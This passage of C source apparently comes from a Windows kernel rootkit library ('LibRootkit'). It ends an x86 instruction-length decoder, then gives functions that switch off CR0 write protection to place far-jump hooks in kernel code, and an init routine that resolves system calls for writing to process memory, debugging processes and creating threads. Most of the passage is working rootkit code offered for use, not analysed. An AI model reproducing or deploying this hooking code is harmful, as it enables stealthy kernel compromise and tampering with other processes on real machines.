               (opcode & 0xF4) == 0x60 && ((opcode & 0x0A) == 0x02 || (opcode & 0x09) == 0x9) || 
               (opcode & 0xF0) == 0x80 || 
               (opcode & 0xF8) == 0xC0 && (opcode & 0x0E) != 0x02 || 
               (opcode & 0xFC) == 0xD0 || 
               (opcode & 0xF6) == 0xF6) 
            { 
                modRM = *func++; 
            } 
        } 
        else 
        { 
            if((opcode & 0xF0) == 0x00 && (opcode & 0x0F) >= 0x04 && (opcode & 0x0D) != 0x0D || 
               (opcode & 0xF0) == 0x30 || 
               opcode == 0x77 || 
               (opcode & 0xF0) == 0x80 || 
               (opcode & 0xF0) == 0xA0 && (opcode & 0x07) <= 0x02 || 
               (opcode & 0xF8) == 0xC8) 
            { 
                // No mod R/M byte 
            } 
            else 
            { 
                modRM = *func++; 
            } 
        } 

        // Skip SIB
        if((modRM & 0x07) == 0x04 &&
           (modRM & 0xC0) != 0xC0)
        {
            func += 1;   // SIB
        }

        // Skip displacement
        if((modRM & 0xC5) == 0x05) func += 4;   // Dword displacement, no base 
        if((modRM & 0xC0) == 0x40) func += 1;   // Byte displacement 
        if((modRM & 0xC0) == 0x80) func += 4;   // Dword displacement 

        // Skip immediate 
        if(FPU) 
        { 
            // Can't have immediate operand 
        } 
        else if(!twoByte) 
        { 
            if((opcode & 0xC7) == 0x04 || 
               (opcode & 0xFE) == 0x6A ||   // PUSH/POP/IMUL 
               (opcode & 0xF0) == 0x70 ||   // Jcc 
               opcode == 0x80 || 
               opcode == 0x83 || 
               (opcode & 0xFD) == 0xA0 ||   // MOV 
               opcode == 0xA8 ||            // TEST 
               (opcode & 0xF8) == 0xB0 ||   // MOV
               (opcode & 0xFE) == 0xC0 ||   // RCL 
               opcode == 0xC6 ||            // MOV 
               opcode == 0xCD ||            // INT 
               (opcode & 0xFE) == 0xD4 ||   // AAD/AAM 
               (opcode & 0xF8) == 0xE0 ||   // LOOP/JCXZ 
               opcode == 0xEB || 
               opcode == 0xF6 && (modRM & 0x30) == 0x00)   // TEST 
            { 
                func += 1; 
            } 
            else if((opcode & 0xF7) == 0xC2) 
            { 
                func += 2;   // RET 
            } 
            else if((opcode & 0xFC) == 0x80 || 
                    (opcode & 0xC7) == 0x05 || 
                    (opcode & 0xF8) == 0xB8 ||
                    (opcode & 0xFE) == 0xE8 ||      // CALL/Jcc 
                    (opcode & 0xFE) == 0x68 || 
                    (opcode & 0xFC) == 0xA0 || 
                    (opcode & 0xEE) == 0xA8 || 
                    opcode == 0xC7 || 
                    opcode == 0xF7 && (modRM & 0x30) == 0x00) 
            { 
                func += operandSize; 
            } 
        } 
        else 
        { 
            if(opcode == 0xBA ||            // BT 
               opcode == 0x0F ||            // 3DNow! 
               (opcode & 0xFC) == 0x70 ||   // PSLLW 
               (opcode & 0xF7) == 0xA4 ||   // SHLD 
               opcode == 0xC2 || 
               opcode == 0xC4 || 
               opcode == 0xC5 || 
               opcode == 0xC6) 
            { 
                func += 1; 
            } 
            else if((opcode & 0xF0) == 0x80) 
            {
                func += operandSize;   // Jcc -i
            }
        }

        count++;
    }

    return (DWORD)func;
}

// XXX: WILL NOT WORK if ToPatch has either a jmp, call or a target
// of a relative jmp in its first 7 bytes (+/-)!!!
NTSTATUS SetupHotPatch(DWORD ToPatch, DWORD Tgt, 
		DWORD PatchBuf, ULONG BufSize)
{
	DWORD RetAddr = FindFirstInsnBoundary((UCHAR *)ToPatch, 7);
	DWORD len = RetAddr - ToPatch;
	DWORD patch;
	WORD CSreg;

	if(len+7 > BufSize) {
		LR_WARN(("Cannot patch %x! %d insufficent (need %d)\n", BufSize,
					len+7));
		return STATUS_ALLOTTED_SPACE_EXCEEDED;
	}

	LR_DEBUG(("DBG: Found patchable region %x-%x (%d long). Patching in %x\n",
				ToPatch, RetAddr, RetAddr-ToPatch, Tgt));

	memcpy((PVOID)(PatchBuf), (PVOID)ToPatch, len);


    __asm {
        CLI 
        MOV    EAX, CR0
        AND EAX, NOT 10000H
        MOV    CR0, EAX


		MOV AX, CS
		MOV CSreg, ax
    }

	// JMP Tgt at beginning of patched region
	*(UCHAR *)(ToPatch) = 0xEA; // JMP
	*(DWORD *)(ToPatch+1) = Tgt;
	*(WORD *)(ToPatch+5) = CSreg; // segment descriptor

	// JMP back at end of patch

	// copied patchcode up to len
	*(UCHAR *)(PatchBuf+len) = 0xEA; // JMP
	*(DWORD *)(PatchBuf+len+1) = RetAddr;
	*(WORD *)(PatchBuf+len+5) = CSreg; // segment descriptor

	__asm {
        MOV    EAX, CR0
        OR    EAX, 10000H
        MOV    CR0, EAX
        STI
    }

	return 0;
}

NTSTATUS UndoHotPatch(DWORD Patched, DWORD PatchBuf)
{
	LR_DEBUG(("DBG: Unpatching 7 byte jump of %x\n", Patched));

    __asm {
        CLI 
        MOV    EAX, CR0
        AND EAX, NOT 10000H
        MOV    CR0, EAX
    }
	
	memcpy((PVOID)Patched, (PVOID)PatchBuf, 7);

	__asm {
        MOV    EAX, CR0
        OR    EAX, 10000H
        MOV    CR0, EAX
        STI
    }

	return 0;
}

int LibRootkit_Init()
{
	HANDLE ntdll;
	WORD sysent;
#ifdef LOG_TO_FILE
	InitDebug();
#endif
	
	sa.ZwQueryInformationProcess = (ZWQUERYINFORMATIONPROCESS)(SYSTEM_SERVICE(ZwQueryInformationProcess));
	sa.ZwTerminateProcess = (ZWTERMINATEPROCESS)(SYSTEM_SERVICE(ZwTerminateProcess));
	sa.ZwCreateSection = (ZWCREATESECTION)(SYSTEM_SERVICE(ZwCreateSection));
	sa.ZwFreeVirtualMemory = (ZWFREEVIRTUALMEMORY)(SYSTEM_SERVICE(ZwFreeVirtualMemory));
	sa.ZwAllocateVirtualMemory = (ZWALLOCATEVIRTUALMEMORY)(SYSTEM_SERVICE(ZwAllocateVirtualMemory));
	sa.ZwCreateSection = (ZWCREATESECTION)(SYSTEM_SERVICE(ZwCreateSection));
	sa.ZwMapViewOfSection = (ZWMAPVIEWOFSECTION)(SYSTEM_SERVICE(ZwMapViewOfSection));
	sa.ZwFlushInstructionCache = (ZWFLUSHINSTRUCTIONCACHE)(SYSTEM_SERVICE(ZwFlushInstructionCache));
	
	if(!(ntdll = KLoadLibrary(L"\\??\\c:\\Windows\\System32\\ntdll.dll"))) {
		LR_WARN(("WRN: Can't open ntdll!\n"));
		return 0;
	}

	sa.ZwCreateProcessEx = 
		(ZWCREATEPROCESSEX)GetSyscall(ntdll, "ZwCreateProcessEx");
	sa.ZwDebugActiveProcess = 
		(ZWDEBUGACTIVEPROCESS)GetSyscall(ntdll, "ZwDebugActiveProcess");
	sa.ZwWriteVirtualMemory = 
			(ZWWRITEVIRTUALMEMORY)GetSyscall(ntdll, "ZwWriteVirtualMemory");
	sa.ZwReadVirtualMemory = 
		(ZWREADVIRTUALMEMORY)GetSyscall(ntdll, "ZwReadVirtualMemory");
	sa.ZwProtectVirtualMemory = 
			(ZWPROTECTVIRTUALMEMORY)GetSyscall(ntdll, "ZwProtectVirtualMemory");
	sa.ZwQueryVirtualMemory = 
			(ZWQUERYVIRTUALMEMORY)GetSyscall(ntdll, "ZwQueryVirtualMemory");
	
	sa.NtLockVirtualMemory = 
			(NTLOCKVIRTUALMEMORY)GetSyscall(ntdll, "NtLockVirtualMemory");
	sa.NtUnlockVirtualMemory = 
			(NTUNLOCKVIRTUALMEMORY)GetSyscall(ntdll, "NtUnlockVirtualMemory");

	sa.ZwCreateThread = 
		(ZWCREATETHREAD)GetSyscall(ntdll, "ZwCreateThread");
	sa.NtQueryInformationThread =
		(NTQUERYINFORMATIONTHREAD)GetSyscall(ntdll, "NtQueryInformationThread");

	KFreeLibrary(ntdll);

	return 1;
}
